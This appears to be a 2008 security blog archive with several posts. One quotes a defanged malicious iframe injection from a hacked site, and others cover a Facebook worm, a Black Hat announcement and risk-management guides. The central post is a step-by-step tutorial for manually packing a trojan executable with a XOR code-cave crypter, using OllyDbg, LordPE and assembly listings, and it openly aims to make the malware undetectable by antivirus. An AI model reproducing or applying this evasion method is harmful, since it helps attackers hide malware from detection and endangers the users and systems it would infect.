Today i came across with an hacked web site containing some  javascript files pointing to a static IP. The content of the webpage hosted by the infected PCs is an iframe from 91.203.93.4, inserted via javascript like this:
document.write "-i-frame sr-c=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 iframe " ;
You can read more about it on:
http://www.matchent.com/wpress/index.php?q=comment/reply/365
Monday, August 11, 2008
RBN?
Thursday, August 7, 2008
The FaceBook virus / worm
---------- Today i so 2 strange mesages from my facebook friends.
- both of them were the same, and i remember that i so an article today about a facebook virus/worm.
- The link directed me to the code in the image, that linked to download a worm.
Wednesday, July 2, 2008
BlackHat USA 2008
Coming soon, in August 2-7, Las Vegas, USA
The Black Hat Briefings return to the venerable Caesars Palace Hotel and Casino for another installment of the premier North American technical information security conference.
Every year the lineup of presentations helps define the security headlines for the following year and 2008 will be no exception."
Last year, as was published in my blog before, I met some great Israeli security researchers on the conference, which I was more than proud to learn from and share knowledge. 
One of them was Aviv Raff which also lectured there on the Defcon summit, and will probably be there this year, and hopefully share some of his thoughts "live".
This year, we will be honored also to get notes, remarks and overall description from another security specialist, Jacky Altal
Monday, June 30, 2008
EXE PACKING – The Hard Way
By Jacky Altal 
Manual packing an application is an important procedure that can be done easily. There are many reasons to pack an application file, for example to secure it from functionality modifications or any other malicious attacks.  Hackers use this method to inject malicious code into applications in order to camouflage harmful code.
Another good use for manual packing would be to bypass Anti Virus software and make arbitrary malicious code to become AV`s best friend.  
Firstly, the entire table section (.text, .date, .rsrc) needs to be encrypted. Alternatively, if the location of the virus signature is known, then only the specific bytes require encrypting. Then it is stored in an unencrypted cave area. A small XOR function needs to be coded to encrypt the code and save to a file.
Once the file is encrypted, it needs to be executed again and the XOR function will run first.  This time, the code will be decrypted back to its original state and the file will run in real-time unrecognizable by the anti-virus.
What is XOR function
XOR, also known as Exclusive OR, is a bitwise operator from binary mathematics. The XOR operator returns a 1 when the value of either the first bit or the second bit is a 1. The XOR operator returns a 0 when neither or both of the bits is 1.
This is best illustrated in the following chart:
F.bit S.bit Result
F F F
F T T
T F T
T T F
The XOR operator is used to "flip" bits (zeroes and ones) in a piece of plaintext to create a cipher text. In other words, if the code section is XORed twice with the same key, it will return to its original state.
Entry Point  <---
             jump to encrypt/cave code
Code Cave  <---
             XOR function encrypt/decrypt
End Cave    <---
Replace Entry Point with a JMP to the crypto routine, Insert the crypto routine into the code cave, then insert the deleted command (the one that was deleted) and then go back to the original coded entry command after the hooked entry command has executed.
The crypto code needs to be run once in order to encrypt the entire section and then it needs to be saved to a file.  The next time that the file is run, the crypto routine will decrypt the code section back to its original state.
Tools
Infected exe (Trojan)
Ollydbg 
LordPE
Hands On
Open up your infected file with Ollydbg and copy the first few commands (backup the commands to a text file). Mark the first few lines and right click copy to clipboard and paste it into a text file. 
-=:Entry Code:=-
00401219 >/$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040121F  |. 55                          PUSH EBP
00401220  |. 89E5                     MOV EBP,ESP
00401222  |. 6A FF                   PUSH -1
Go to the end of the file and look for DB 00 in the code cave (at the end of the file) and first try to write to that area. If the section is writeable then you are set and you don’t need to change the section permissions.
-=:Cave Code:=-
0040E4FD     0000           ADD BYTE PTR DS:[EAX],AL
0040E4FF     0000           ADD BYTE PTR DS:[EAX],AL
0040E501     0000           ADD BYTE PTR DS:[EAX],AL
0040E503     0000           ADD BYTE PTR DS:[EAX],AL
If you receive an error message it means that this area is protected, and we will need to modify the PE section to allow us to write to this area. It can be easily done with LordPE (edit the section properties).
 
Open up LordPE, load your file and click on the Section button. Once done, right click the data section and choose the properties window. Click the checkboxes to make the file writeable and executable. The file is done.
The following routine will be used to XOR the data section. Actually, this is a simple encryption routine that will start to XOR every byte from the data section (@0040129c) with our key (0f). The loop will stop at the end of the data section (@0040E46C).
Encryption Routine
mov eax,0040129c
xor byte [eax],0f
inc eax
cmp eax,0040E46C
jle [xor address]
Deleted Call
00401219 >/$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040121F  |. 55                          PUSH EBP
Jump back to application flow
00401219 >   E9 E2D20000    JMP finish1t.0040E500
0040121E     90             NOP
 
The final code should look like the following:
XOR Loop + Deleted Call + Jump back to application flow.
Code Cave:
0040E500     B8 9C124000    MOV EAX,finish1t.0040129C                ;  Entry address
0040E505     8030 0F           XOR BYTE PTR DS:[EAX],0F
0040E508     0                     INC EAX
0040E509   3D  6CE44000   CMP EAX,
0040E50E   7E F5               JLE SHORT finish1t.0040E505
0040E510   64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
0040E516   E9 042DFFFF    JMP finish1t.0040121F
Now, Lets put a break point at the end of the loop; line 0040e510 and execute the code. Once the execution stops, save the file and exit ollydbg.
00401219 >/$ 64:A1 00000000 JMP finish1t. 0040E500
Last but not least, double check that you changed the application flows to jump to the cave code address.
 
The file is unrecognized by the antivirus software now.  File is ready.
Friday, February 29, 2008
Thursday, February 14, 2008
The Threats and Countermeasures Guide

Brief Description
Security Settings in Windows Server 2003 and Windows XP
The Threats and Countermeasures guide provides you with a reference to all security settings that provide countermeasures for specific threats against current versions of the Microsoft® Windows® operating systems
Download the guied here 
This guide is a companion for two other publications that are available from Microsoft:
• Windows Server 2003 Security Guide, available online at
http://go.microsoft.com/fwlink/?LinkId=14845
 
• Windows XP Security Guide, available online at
http://go.microsoft.com/fwlink/?LinkId=14839
Additional useful info while Assessing Risk

Asset Classes
For additional information on defining and categorizing information and information systems, refer to National Institute of Standards and Technology (NIST) Special Publication 800-60 workshops, "Mapping Types of Information and Information Systems to Security Categories," and the Federal Information Processing Standards (FIPS) publication 199, "Security Categorization of Federal Information and Information Systems."
for "Common Information System Assets" http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappb.mspx
for "Common Threats"
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappc.mspx
for examples of "Vulnerabilities"
http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappd.mspx
More info on Security Risk Management

"Microsoft’s approach to risk management and assessment isn’t the only one available to organizations. Some other popular approaches include:
    * Risk Management Guide for Information Technology Systems and Security Self-Assessment Guide for Information Technology Systems, both developed by the National Institute for Standards and Technology (NIST)
http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf
http://csrc.nist.gov/publications/nistpubs/800-26/sp800-26.pdf
    * Information technology — Code of practice for information security management (ISO 17799), available from the International Standards Organization (ISO).
http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=33441&ICS1=35&ICS2=40&ICS3=
    * Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) from Computer Emergency Response Team (CERT) at the Software Engineering Institute at Carnegie-Mellon University.
http://www.cert.org/octave
These resources are also useful in helping you plan and implement an effective risk management solution for your company. But in my opinion, Microsoft’s approach is simple and easy to implement, and is a good starting point, especially for IT shops that are strong on Microsoft platforms. For although the Guide is described by Microsoft as being cross-platform and vendor-neutral in its approach, its prescriptive control solutions target Microsoft products in particular. That doesn’t surprise me however, and in no way reduces the usefulness of this excellent Guide."
Read source...
 
 

